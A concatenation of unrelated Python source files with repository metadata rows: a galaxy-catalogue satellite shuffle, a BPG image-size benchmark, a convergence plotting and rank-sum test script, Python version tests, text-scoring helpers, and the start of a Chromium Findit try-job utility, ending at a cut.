    mass_bin_ind = np.digitize(GC['host_mass'][centrals], bins=mass_bins) #indices of groups in log(host_mass) bins
    #go through each mass bin
    for i in range(0,len(mass_bins)-1):
        print i, 'mass bin:', mass_bins[i], mass_bins[i+1]
        ind = np.where(mass_bin_ind==i+1)[0] #indices of host haloes in this mass bin
        if len(ind)>0: #if there are any haloes in the mass bin
            print 'number of groups:', len(ind)
            ids = GC['id'][centrals[ind]]
            sat_galaxy_members = np.in1d(GC['upid'],ids) #satellite galaxies in the mass bin
            sat_galaxy_members = np.where(sat_galaxy_members)[0] #indicies of galaxies
            cen_galaxy_members = np.in1d(GC['id'],ids) #central galaxies in the mass bin
            cen_galaxy_members = np.where(cen_galaxy_members)[0] #indicies of galaxies
            galaxy_members = np.hstack((sat_galaxy_members,cen_galaxy_members))
            print 'number of galaxies:', len(galaxy_members)
            satellite_members = np.where(GC['upid'][galaxy_members]!=-1)[0] #satellites
            satellite_members = galaxy_members[satellite_members] #indices of satellites
            central_members = np.where(GC['upid'][galaxy_members]==-1)[0] #centrals
            central_members = galaxy_members[central_members] #indices of centrals
            print 'number of centrals:', len(central_members)
            print 'number of satellites:', len(satellite_members)
            print 'check:', len(central_members) + len(satellite_members) == len(galaxy_members)
            #shuffle list of host haloes in mass bin
            # NOTE(review): `shuffle`/`shuffled_central_members`/`unshuffle`
            # are computed but never used below; the reassignment actually
            # uses `ran_index` only.
            shuffle = np.random.permutation(np.arange(0,len(central_members),1))
            shuffled_central_members = central_members[shuffle]
            unshuffle = np.arange(0,len(central_members),1)
            ran_index = np.random.random_integers(0,len(central_members)-1,len(satellite_members))
            #shuffle satellite systems --> leave gal props alone, change halo props
            # NOTE(review): this inner loop reuses the outer loop index `i`;
            # harmless here (the outer `for` rebinds `i` each iteration) but
            # worth renaming for clarity.
            for i in range(0,len(satellite_members)):
                print "\r",i,
                sys.stdout.flush()
                old_host_ID = GC['upid'][satellite_members[i]] #old host halo ID
                old_host_ind = np.where(GC['id']==old_host_ID)[0] #index of old host central
                new_host_ind = ran_index[i] #location in central members list
                new_host_ind = central_members[new_host_ind] #new host index
                #assign a new host properties
                GC_new['upid'][satellite_members[i]] = GC['id'][new_host_ind]
                GC_new['host_mass'][satellite_members[i]] = GC['host_mass'][new_host_ind]
                GC_new['mvir'][satellite_members[i]] = GC['mvir'][new_host_ind]
                GC_new['rvir'][satellite_members[i]] = GC['rvir'][new_host_ind]
                #calculate satellite positions
                # Re-center the satellite on its new host, preserving its
                # offset from the old host.
                x_new_cen = GC['x'][new_host_ind]
                y_new_cen = GC['y'][new_host_ind]
                z_new_cen = GC['z'][new_host_ind]
                x_old_cen = GC['x'][old_host_ind]
                y_old_cen = GC['y'][old_host_ind]
                z_old_cen = GC['z'][old_host_ind]
                GC_new['x'][satellite_members[i]] = GC_new['x'][satellite_members[i]] - x_old_cen + x_new_cen
                GC_new['y'][satellite_members[i]] = GC_new['y'][satellite_members[i]] - y_old_cen + y_new_cen
                GC_new['z'][satellite_members[i]] = GC_new['z'][satellite_members[i]] - z_old_cen + z_new_cen
                #calculate satellite velocities
                # Same re-centering applied to the peculiar velocities.
                Vx_new_cen = GC['vx'][new_host_ind]
                Vy_new_cen = GC['vy'][new_host_ind]
                Vz_new_cen = GC['vz'][new_host_ind]
                Vx_old_cen = GC['vx'][old_host_ind]
                Vy_old_cen = GC['vy'][old_host_ind]
                Vz_old_cen = GC['vz'][old_host_ind]
                GC_new['vx'][satellite_members[i]] = GC_new['vx'][satellite_members[i]] - Vx_old_cen + Vx_new_cen
                GC_new['vy'][satellite_members[i]] = GC_new['vy'][satellite_members[i]] - Vy_old_cen + Vy_new_cen
                GC_new['vz'][satellite_members[i]] = GC_new['vz'][satellite_members[i]] - Vz_old_cen + Vz_new_cen
    #Fix any boundary condition issues, Lbox=250 Mpc
    # Wrap re-centered coordinates back into the periodic box.
    fix = np.where(GC_new['x'] < 0.0)[0]
    GC_new['x'][fix] = 250.0 - np.absolute(GC_new['x'][fix])
    fix = np.where(GC_new['y'] < 0.0)[0]
    GC_new['y'][fix] = 250.0 - np.absolute(GC_new['y'][fix])
    fix = np.where(GC_new['z'] < 0.0)[0]
    GC_new['z'][fix] = 250.0 - np.absolute(GC_new['z'][fix])
    fix = np.where(GC_new['x'] > 250.0)[0]
    GC_new['x'][fix] = GC_new['x'][fix] - 250.0
    fix = np.where(GC_new['y'] > 250.0)[0]
    GC_new['y'][fix] = GC_new['y'][fix] - 250.0
    fix = np.where(GC_new['z'] > 250.0)[0]
    GC_new['z'][fix] = GC_new['z'][fix] - 250.0
    catalogue = catalogue+'_satrel_shuffle'
    print 'saving hdf5 version of the catalogue...'
    filename = catalogue
    print filename
    f = h5py.File(savepath+filename+'.hdf5', 'w')
    dset = f.create_dataset(catalogue, data=GC_new)
    f.close()
    print 'saving ascii version of the catalogue...'
    print filename
    data_table = table.table.Table(data=GC_new)
    ascii.write(data_table, savepath+filename+'.dat')
    print data_table
if __name__ == '__main__':
    # Run the shuffle for every SHAM style and magnitude cut.
    for sham_style in ['tailored' , 'Vpeak']:
        for mr in [18.0,18.5,19.5,20.5,20.0]:
            # Bug fix: main requires (Mr, sham_style); the original call
            # passed only mr and raised TypeError on the first iteration.
            main(mr, sham_style)
| 52.257353 | 144 | 0.622485 | 1,051 | 7,107 | 3.978116 | 0.18078 | 0.04664 | 0.069122 | 0.045444 | 0.277685 | 0.235111 | 0.10763 | 0.064578 | 0.054054 | 0.024396 | 0 | 0.02872 | 0.240608 | 7,107 | 135 | 145 | 52.644444 | 0.74597 | 0.130716 | 0 | 0.018692 | 0 | 0 | 0.10253 | 0.021417 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.046729 | null | null | 0.130841 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a5ee84e6d9c767a419743056d427e75818c7b96 | 5,957 | py | Python | bpg_file_size.py | yoshitomo-matsubara/supervised-compression | 6df52222c6407e8fac7d34d5e25b218910f686cf | [
"Apache-2.0"
] | 12 | 2021-11-02T00:38:47.000Z | 2022-03-15T12:57:03.000Z | bpg_file_size.py | yoshitomo-matsubara/supervised-compression | 6df52222c6407e8fac7d34d5e25b218910f686cf | [
"Apache-2.0"
] | null | null | null | bpg_file_size.py | yoshitomo-matsubara/supervised-compression | 6df52222c6407e8fac7d34d5e25b218910f686cf | [
"Apache-2.0"
] | 1 | 2022-02-22T06:53:35.000Z | 2022-02-22T06:53:35.000Z | import argparse
import os
import numpy as np
from torchdistill.datasets.transform import CustomCompose, CustomRandomResize
from torchdistill.datasets.util import load_coco_dataset, build_transform
from torchvision.datasets import ImageFolder, VOCSegmentation
from torchvision.transforms import transforms
from custom.transform import BPG
def get_argparser():
    """Build the CLI parser: one required --dataset choice."""
    parser = argparse.ArgumentParser(
        description='BPG file size for ImageNet and COCO segmentation datasets')
    parser.add_argument('--dataset', required=True,
                        choices=['imagenet', 'coco_segment', 'pascal_segment'],
                        help='ckpt dir path')
    return parser
def compute_bpg_file_size_with_transform(dataset, quality):
    """Resize/center-crop each image to 224x224, encode it with BPG at
    *quality*, and print the mean/std encoded size in KB."""
    preprocess = transforms.Compose([
        transforms.Resize(256),
        transforms.CenterCrop(224)
    ])
    bpg_codec = BPG(bpg_quality=quality, encoder_path='~/manually_installed/libbpg-0.9.8/bpgenc',
                    decoder_path='~/manually_installed/libbpg-0.9.8/bpgdec')
    sizes_kb = []
    for sample in dataset:
        cropped = preprocess(sample[0])
        _, size_kbyte = bpg_codec.run(cropped)
        sizes_kb.append(size_kbyte)
    file_sizes = np.array(sizes_kb)
    print('BPG quality: {}, File size [KB]: {} ± {}'.format(quality, file_sizes.mean(), file_sizes.std()))
def compute_bpg_file_size_for_imagenet_dataset():
    """Report mean BPG file size on the ImageNet validation set for
    qualities 50, 45, ..., 5, 0."""
    dataset = ImageFolder(root=os.path.expanduser('~/dataset/ilsvrc2012/val'))
    # One loop over the quality sweep instead of eleven copy-pasted calls;
    # range(50, -1, -5) reproduces the original order 50, 45, ..., 5, 0.
    for quality in range(50, -1, -5):
        compute_bpg_file_size_with_transform(dataset, quality)
def compute_bpg_file_size(dataset, quality):
    """Encode every image in *dataset* with BPG at *quality* and print the
    mean/std encoded size in KB."""
    bpg_codec = BPG(bpg_quality=quality, encoder_path='~/manually_installed/libbpg-0.9.8/bpgenc',
                    decoder_path='~/manually_installed/libbpg-0.9.8/bpgdec')
    sizes_kb = []
    for sample in dataset:
        _, size_kbyte = bpg_codec.run(sample[0])
        sizes_kb.append(size_kbyte)
    file_sizes = np.array(sizes_kb)
    print('BPG quality: {}, File size [KB]: {} ± {}'.format(quality, file_sizes.mean(), file_sizes.std()))
def compute_bpg_file_size_for_cocosegment_dataset():
    """Report mean BPG file size on COCO 2017 val (segmentation config) for
    qualities 50, 45, ..., 5, 0."""
    split_config = {
        'images': '~/dataset/coco2017/val2017',
        'annotations': '~/dataset/coco2017/annotations/instances_val2017.json',
        'annotated_only': False,
        'is_segment': True,
        'transforms_params': [
            {'type': 'CustomRandomResize', 'params': {'min_size': 520, 'max_size': 520}}
        ]
    }
    is_segment = split_config.get('is_segment', False)
    # CustomCompose is required for segmentation because transforms take
    # (image, target) pairs.
    compose_cls = CustomCompose if is_segment else None
    transforms = build_transform(split_config.get('transforms_params', None), compose_cls=compose_cls)
    dataset = load_coco_dataset(split_config['images'], split_config['annotations'],
                                split_config['annotated_only'], split_config.get('random_horizontal_flip', None),
                                is_segment, transforms, split_config.get('bpg_quality', None))
    # One loop over the quality sweep instead of eleven copy-pasted calls;
    # range(50, -1, -5) reproduces the original order 50, 45, ..., 5, 0.
    for quality in range(50, -1, -5):
        compute_bpg_file_size(dataset, quality)
def compute_bpg_file_size_with_transform_and_target(dataset, transform, quality):
    """Apply a (image, target) transform to each sample, encode the image with
    BPG at *quality*, and print the mean/std encoded size in KB."""
    bpg_codec = BPG(bpg_quality=quality, encoder_path='~/manually_installed/libbpg-0.9.8/bpgenc',
                    decoder_path='~/manually_installed/libbpg-0.9.8/bpgdec')
    file_size_list = list()
    for img in dataset:
        # transform expects (image, target); the transformed target is unused.
        img, _ = transform(img[0], img[1])
        img, file_size_kbyte = bpg_codec.run(img)
        file_size_list.append(file_size_kbyte)
    file_sizes = np.array(file_size_list)
    # 'BPG' capitalized for consistency with the other compute_* helpers
    # (the original printed lowercase 'bpg' only here).
    print('BPG quality: {}, File size [KB]: {} ± {}'.format(quality, file_sizes.mean(), file_sizes.std()))
def compute_bpg_file_size_for_pascalsegment_dataset():
    """Report mean BPG file size on PASCAL VOC 2012 val (segmentation) for
    qualities 50, 45, ..., 5, 0."""
    dataset = VOCSegmentation(root=os.path.expanduser('~/dataset/'), image_set='val', year='2012')
    transform = CustomCompose([
        CustomRandomResize(min_size=512, max_size=512)
    ])
    # One loop over the quality sweep instead of eleven copy-pasted calls;
    # range(50, -1, -5) reproduces the original order 50, 45, ..., 5, 0.
    for quality in range(50, -1, -5):
        compute_bpg_file_size_with_transform_and_target(dataset, transform, quality)
if __name__ == '__main__':
    # Dispatch on the --dataset choice (argparse restricts it to three values;
    # anything other than the two explicit keys is pascal_segment).
    args = get_argparser().parse_args()
    dispatch = {
        'imagenet': compute_bpg_file_size_for_imagenet_dataset,
        'coco_segment': compute_bpg_file_size_for_cocosegment_dataset,
    }
    dispatch.get(args.dataset, compute_bpg_file_size_for_pascalsegment_dataset)()
| 44.789474 | 113 | 0.737787 | 791 | 5,957 | 5.14665 | 0.166877 | 0.119872 | 0.116188 | 0.185704 | 0.671334 | 0.642103 | 0.576026 | 0.404323 | 0.404323 | 0.404323 | 0 | 0.024825 | 0.161491 | 5,957 | 132 | 114 | 45.128788 | 0.78959 | 0 | 0 | 0.223214 | 0 | 0 | 0.136646 | 0.061272 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.071429 | 0 | 0.142857 | 0.026786 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a63ebc8faf56252bf51b4bbf71aad27de4c9ad0 | 5,492 | py | Python | postRunScripts/convergence.py | burks-pub/gecco2015 | 2a7e32381d2e978e52c824d8348cf106619bb795 | [
"BSD-2-Clause"
] | null | null | null | postRunScripts/convergence.py | burks-pub/gecco2015 | 2a7e32381d2e978e52c824d8348cf106619bb795 | [
"BSD-2-Clause"
] | null | null | null | postRunScripts/convergence.py | burks-pub/gecco2015 | 2a7e32381d2e978e52c824d8348cf106619bb795 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/python
import sys
import os
import re
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
import numpy as np
import scipy.stats as stats
#Matplotlib font stuff (for making figures with legible text)
#Matplotlib font stuff (for making figures with legible text)
font = {'size': '9'}
matplotlib.rc('font', **font)

#USE TYPE 1 FONTS!!
# Type 1 / core fonts are presumably a requirement of the publication venue
# for EPS output -- confirm before changing these rcParams.
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True

#This script takes a set of directories and gets the average ending evaluation#
#including error bars for runs that found the optimal solution. This works on
#simple and layered population data. In the case of layered, we take the max
#fitness of all layers for each point in time.

#Colors to plot in...
# NOTE(review): COLORS is not referenced anywhere in this file; it may be a
# leftover from an earlier plotting style.
COLORS = ["#336699", "#993300", "#999933", "#666699", "#CC9933", "#006666", "#99CCFF"]
#Plots the average convergence evals in a bar chart for each of the algorithms
#Also returns the list of ending evals for each algorithm so we can do stats tests
def plotConvergence(resultsDirs, outDir, labels):
    """Collect convergence evaluations and plot them as a bar chart.

    Walks each results directory for fitness log files, records the
    evaluation count at which each run first reached max fitness 1.0, then
    plots the per-directory means with 95% confidence intervals to
    outDir/convergence.eps.

    Returns the list of per-directory ending-eval lists (only directories
    with at least one successful run) for later stats tests.
    """
    #Make sure the output directory exists
    if not os.path.exists(outDir):
        os.makedirs(outDir)

    allEndingEvals = [] #[list of ending evals for each successful run in each dir]
    for i in range(len(resultsDirs)):
        resultsDir = resultsDirs[i]
        label = labels[i]
        endingEvals = []
        for dirname, dirs, files in os.walk(resultsDir):
            for fName in files:
                m = re.match("fitness([\d]+.*)", fName)
                if m != None:
                    outFile = open(os.path.join(dirname, fName))
                    foundOptimal=False
                    #Go line-by-line and get the earliest perfect fitness
                    for line in outFile:
                        if not foundOptimal:
                            data = line.strip().split("\t")
                            #We have layered population data
                            # (columns after evals are avg:max per layer)
                            if line.find(":") >= 0:
                                numEvals = long(data[1])
                                # NOTE(review): `start` is never read below;
                                # looks like dead code.
                                start = True
                                for lyrData in data[2:]:
                                    avgFit, maxFit = [float(item) for item in lyrData.split(":")]
                                    #See if the max fitness is 1.0
                                    if maxFit == 1.0:
                                        endingEvals.append(numEvals)
                                        foundOptimal = True
                                        break
                            #We have Simple population data
                            else:
                                numEvals = long(data[1])
                                maxFit, avgFit = [float(item) for item in data[2:]]
                                #See if the max fitness is 1.0
                                if maxFit == 1.0:
                                    endingEvals.append(numEvals)
                                    foundOptimal = True
                                    break
                        #Stop reading the file once we've found the optimal
                        if foundOptimal:
                            break
        if len(endingEvals) > 0:
            allEndingEvals.append(endingEvals)

    #Get the averages and 95% confidence intervals
    averages = []
    cis = []
    for endingEvals in allEndingEvals:
        averages.append(np.average(endingEvals))
        # 1.96 * standard error of the mean = half-width of a 95% CI.
        cis.append(1.96 * stats.sem(endingEvals))

    #Plot the data
    numAlgs = len(allEndingEvals)
    ind = np.arange(numAlgs)
    xTicks = [i + .3 for i in range(numAlgs)]

    #Explicitly set the figure size
    plt.figure(figsize=(3.0,2.0))
    plt.bar(xTicks, averages, .5,
            color= "grey", yerr=cis, ecolor="black", align="center")
    plt.xticks(xTicks, labels)
    plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))
    plt.ylabel('Mean Evaluations')
    plt.savefig(os.path.join(outDir, "convergence.eps"), bbox_inches="tight")

    #Return the collection of all ending evals
    return allEndingEvals
#Does pairwise Mann-Whitney U tests for the ending evals for all experiment sets
#Writes the results in a table (matrix) form to outDir/convergencePVals.txt
#Also writes out all the averages to outDir/convergenceAverages.txt
def doStatsTests(allEndingEvals, outDir, labels):
    """Write pairwise rank-sum p-values and per-algorithm averages to files.

    Produces outDir/convergencePVals.txt (upper-triangular matrix of pairwise
    p-values, with labels as header/row names) and
    outDir/convergenceAverages.txt (label<TAB>mean ending evals per line).
    """
    # NOTE(review): the original comment said "at least 2 sets to compare",
    # but the guard accepts a single set (the pairwise loop then does
    # nothing) -- confirm which is intended.
    if len(allEndingEvals) >= 1:
        #Setup the output files
        pValsFile = open("%s/convergencePVals.txt" %outDir, "w")
        avgFile = open("%s/convergenceAverages.txt" %outDir, "w")

        #Holds the "table" to print out to file
        allPVals = []
        #Do the pairwise comparisons
        for i in range(len(allEndingEvals)-1):
            #Calculate and write the average
            avgEndingEvals = np.average(allEndingEvals[i])
            avgFile.write("%s\t%s\n" %(labels[i], avgEndingEvals))
            pVals = []
            for j in range(len(allEndingEvals)):
                if j > i: #only fill in the upper diag (lower is the same...)
                    # stats.ranksums is the Wilcoxon rank-sum test (the
                    # two-sample analogue of the Mann-Whitney U mentioned above).
                    zStat, pVal = stats.ranksums(allEndingEvals[i], allEndingEvals[j])
                    pVals.append("%.5f" %pVal)
                else:
                    pVals.append("--")
            allPVals.append(pVals)

        #Add a header row of labels
        pValsFile.write("\t" + "\t".join(labels) + "\n")
        for i in range(len(allPVals)):
            pValsFile.write(labels[i] + "\t" + "\t".join(allPVals[i]) + "\n")

        #Calculate and write the average for the last alg
        # (the pairwise loop above stops one short of the final set)
        avgEndingEvals = np.average(allEndingEvals[-1])
        avgFile.write("%s\t%s\n" %(labels[-1], avgEndingEvals))

        #Done!
        pValsFile.close()
        avgFile.close()
#-------------- MAIN ------------------------
if __name__ == "__main__":
if len(sys.argv) != 4:
print "Usage convergence.py <INPUT_DIR_LIST (no spaces!)> <LABELS (no spaces!)> <OUTPUT_DIR>"
print "Example: convergence.py dir1,dir2,dir3 label1,label2,label3 outputDir"
quit()
#Directories from which we should get the results
resultsDirs = [dirname for dirname in sys.argv[1].split(",")]
labels = [label for label in sys.argv[2].split(",")]
#Output directory
outDir = sys.argv[3]
#Plot the convergence times
allEndingEvals = plotConvergence(resultsDirs, outDir, labels)
#Do pairwise Mann-Whitney U tests on each algorithm
if len(allEndingEvals) >= 1:
doStatsTests(allEndingEvals, outDir, labels)
| 28.604167 | 95 | 0.675346 | 761 | 5,492 | 4.856767 | 0.374507 | 0.00947 | 0.006494 | 0.011905 | 0.116342 | 0.0671 | 0.054113 | 0.042208 | 0.042208 | 0.042208 | 0 | 0.019323 | 0.199017 | 5,492 | 191 | 96 | 28.753927 | 0.820868 | 0.305171 | 0 | 0.148515 | 0 | 0 | 0.111465 | 0.013004 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.079208 | null | null | 0.019802 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a685330ea7dc697bfb2bb1cb1fdd5db2f1757dd | 938 | py | Python | build/platform/python/tests/test_common.py | jochenater/catboost | de2786fbc633b0d6ea6a23b3862496c6151b95c2 | [
"Apache-2.0"
] | 6,989 | 2017-07-18T06:23:18.000Z | 2022-03-31T15:58:36.000Z | build/platform/python/tests/test_common.py | birichie/catboost | de75c6af12cf490700e76c22072fbdc15b35d679 | [
"Apache-2.0"
] | 1,978 | 2017-07-18T09:17:58.000Z | 2022-03-31T14:28:43.000Z | build/platform/python/tests/test_common.py | birichie/catboost | de75c6af12cf490700e76c22072fbdc15b35d679 | [
"Apache-2.0"
] | 1,228 | 2017-07-18T09:03:13.000Z | 2022-03-29T05:57:40.000Z | import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
| 29.3125 | 87 | 0.678038 | 127 | 938 | 4.834646 | 0.433071 | 0.091205 | 0.102606 | 0.127036 | 0.350163 | 0.350163 | 0.350163 | 0.249186 | 0.172638 | 0 | 0 | 0.034308 | 0.160981 | 938 | 31 | 88 | 30.258065 | 0.74587 | 0.026652 | 0 | 0.136364 | 0 | 0 | 0.1427 | 0.023052 | 0 | 0 | 0 | 0 | 0.045455 | 1 | 0.136364 | false | 0 | 0.363636 | 0 | 0.5 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
7a6ff3a5dd2da7887cb19a6ed2c1752b6e82d6cc | 2,834 | py | Python | src/score.py | alexwarstadt/phrase-analogies-large-vae | 2d5734ebdcdee916038f4654fd1a9339df3d2273 | [
"MIT"
] | 1 | 2021-04-22T14:52:10.000Z | 2021-04-22T14:52:10.000Z | src/score.py | alexwarstadt/phrase-analogies-large-vae | 2d5734ebdcdee916038f4654fd1a9339df3d2273 | [
"MIT"
] | 1 | 2021-04-26T22:28:42.000Z | 2021-04-28T19:09:11.000Z | src/score.py | alexwarstadt/phrase-analogies-large-vae | 2d5734ebdcdee916038f4654fd1a9339df3d2273 | [
"MIT"
] | 1 | 2021-08-06T14:55:16.000Z | 2021-08-06T14:55:16.000Z | import re
from nltk.translate import bleu_score as nltkbleu
from typing import List, Optional
import nli
def exact_calc(output, pred):
    """Exact-match score: 1 if the two strings match after stripping
    whitespace and lower-casing, else 0.

    Non-string arguments are reported and score 0, matching the original
    behavior. The original used assert for this validation, which silently
    disappears under ``python -O``; an explicit isinstance check does not.
    """
    if not (isinstance(output, str) and isinstance(pred, str)):
        print("Error: Trying to compare {} and {}".format(output, pred))
        return 0
    return int(output.strip().lower() == pred.strip().lower())
def nli_calc(sent_c, predicted_d):
    """
    sent_c is a list /tensor / series of c sentences, predicted_d a list/tensor/series of predicated d sentences.
    Returns one of entailment/contradiction/neutral for each value in the series

    Thin wrapper over nli.eval_nli with its default (three-label) setting;
    see nli_no_neutral_calc for the two-label variant.
    """
    return nli.eval_nli(sent_c, predicted_d)
def nli_no_neutral_calc(sent_c, predicted_d):
    """
    sent_c is a list /tensor / series of c sentences, predicted_d a list/tensor/series of predicated d sentences.
    Returns one of entailment/contradiction (excluding neutral) for each value in the series

    Same as nli_calc but with without_neutral=True, restricting the labels
    to entailment/contradiction.
    """
    return nli.eval_nli(sent_c, predicted_d, without_neutral=True)
# Following adapted from
# https://github.com/facebookresearch/ParlAI/blob/2426d74b93184689be5067bdbf99f1ba96748f7b/parlai/core/metrics.py
re_punc = re.compile(r'[!"#$%&()*+,-./:;<=>?@\[\]\\^`{|}~_\']')


def normalize_answer(s):
    """Lower-case *s*, replace punctuation with spaces, and collapse
    whitespace runs into single spaces."""
    lowered = s.lower()
    de_punctuated = re_punc.sub(" ", lowered)
    # split()/join collapses any run of whitespace into one space and trims.
    # TODO: this could almost certainly be faster with a regex \s+ -> ' '
    return " ".join(de_punctuated.split())
def bleu_calc(output, pred):
    """BLEU score of *pred* against the single reference *output*.

    The n-gram order is capped at 4 and at the shorter of the two normalized
    token sequences. Non-string arguments are reported and return None
    (preserved from the original so existing callers are unaffected).

    The original used assert for the type check, which silently disappears
    under ``python -O``; an explicit isinstance check (matching exact_calc)
    does not.
    """
    if not (isinstance(output, str) and isinstance(pred, str)):
        print("Error: Trying to compare {} and {}".format(output, pred))
        return None
    min_length = min(
        len(normalize_answer(pred).split(" ")),
        len(normalize_answer(output).split(" ")),
        4,
    )
    return bleu_compute(pred, [output], k=min_length)
def bleu_compute(guess: str, answers: List[str], k: int = 4) -> float:
    """
    Compute approximate BLEU score between guess and a set of answers.
    """
    # Warning: BLEU calculation *should* include proper tokenization and
    # punctuation etc. We're using the normalize_answer for everything though,
    # so we're over-estimating our BLEU scores. Also note that NLTK's bleu is
    # going to be slower than fairseq's (which is written in C), but fairseq's
    # requires that everything be in arrays of ints (i.e. as tensors). NLTK's
    # works with strings, which is better suited for this module.
    uniform_weights = [1 / k for _ in range(k)]
    reference_token_lists = [normalize_answer(answer).split(" ") for answer in answers]
    guess_tokens = normalize_answer(guess).split(" ")
    return nltkbleu.sentence_bleu(
        reference_token_lists,
        guess_tokens,
        smoothing_function=nltkbleu.SmoothingFunction(epsilon=1e-12).method1,
        weights=uniform_weights,
    )
| 34.144578 | 113 | 0.673606 | 388 | 2,834 | 4.822165 | 0.407216 | 0.016034 | 0.029931 | 0.032068 | 0.35489 | 0.35489 | 0.35489 | 0.35489 | 0.35489 | 0.35489 | 0 | 0.015639 | 0.210303 | 2,834 | 82 | 114 | 34.560976 | 0.820375 | 0.402258 | 0 | 0.190476 | 0 | 0 | 0.068027 | 0.022263 | 0 | 0 | 0 | 0.012195 | 0.095238 | 1 | 0.142857 | false | 0 | 0.095238 | 0 | 0.428571 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7a77403338ee31e5e87171f17d753b2434e4a1a1 | 7,341 | py | Python | appengine/findit/waterfall/try_job_util.py | eunchong/infra | ce3728559112bfb3e8b32137eada517aec6d22f9 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/waterfall/try_job_util.py | eunchong/infra | ce3728559112bfb3e8b32137eada517aec6d22f9 | [
"BSD-3-Clause"
] | null | null | null | appengine/findit/waterfall/try_job_util.py | eunchong/infra | ce3728559112bfb3e8b32137eada517aec6d22f9 | [
"BSD-3-Clause"
] | null | null | null | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
from google.appengine.ext import ndb
from common import appengine_util
from common import constants
from model import analysis_status
from model.wf_try_job import WfTryJob
from waterfall import swarming_tasks_to_try_job_pipeline
from waterfall import waterfall_config
from waterfall.try_job_type import TryJobType
def _CheckFailureForTryJobKey(
master_name, builder_name, build_number,
failure_result_map, failed_step_or_test, failure):
"""Compares the current_failure and first_failure for each failed_step/test.
If equal, a new try_job needs to start;
If not, apply the key of the first_failure's try_job to this failure.
"""
# TODO(chanli): Need to compare failures across builders
# after the grouping of failures is implemented.
# TODO(chanli): Need to handle cases where first failure is actually
# more than 20 builds back. The implementation should not be here,
# but need to be taken care of.
if not failure.get('last_pass'):
# Bail out since cannot figure out the good_revision.
return False, None
if failure['current_failure'] == failure['first_failure']:
failure_result_map[failed_step_or_test] = '%s/%s/%s' % (
master_name, builder_name, build_number)
return True, failure['last_pass'] # A new try_job is needed.
else:
failure_result_map[failed_step_or_test] = '%s/%s/%s' % (
master_name, builder_name, failure['first_failure'])
return False, None
def _CheckIfNeedNewTryJobForTestFailure(
    failure_level, master_name, builder_name, build_number,
    failure_result_map, failures):
  """Traverses failed steps or tests to check if a new try job is needed.

  Args:
    failure_level: 'step' when iterating failed steps, 'test' when recursing
        into the per-test failures of one step.
    failure_result_map: dict mutated in place with a try-job key per failure.
    failures: dict of step/test name -> failure info.

  Returns:
    (targeted_tests, need_new_try_job, last_pass) where targeted_tests is a
    dict of step -> test names at 'step' level and a list of test names at
    'test' level, and last_pass is the earliest known passing build.
  """
  need_new_try_job = False
  last_pass = build_number
  targeted_tests = {} if failure_level == 'step' else []
  # Fix: use items() instead of the Python-2-only iteritems() so this module
  # runs unchanged on both Python 2 and Python 3.
  for failure_name, failure in failures.items():
    if 'tests' in failure:
      # This step has a per-test breakdown: recurse one level down.
      failure_result_map[failure_name] = {}
      failure_targeted_tests, failure_need_try_job, failure_last_pass = (
          _CheckIfNeedNewTryJobForTestFailure(
              'test', master_name, builder_name, build_number,
              failure_result_map[failure_name], failure['tests']))
      if failure_need_try_job:
        targeted_tests[failure_name] = failure_targeted_tests
    else:
      failure_need_try_job, failure_last_pass = _CheckFailureForTryJobKey(
          master_name, builder_name, build_number,
          failure_result_map, failure_name, failure)
      if failure_need_try_job:
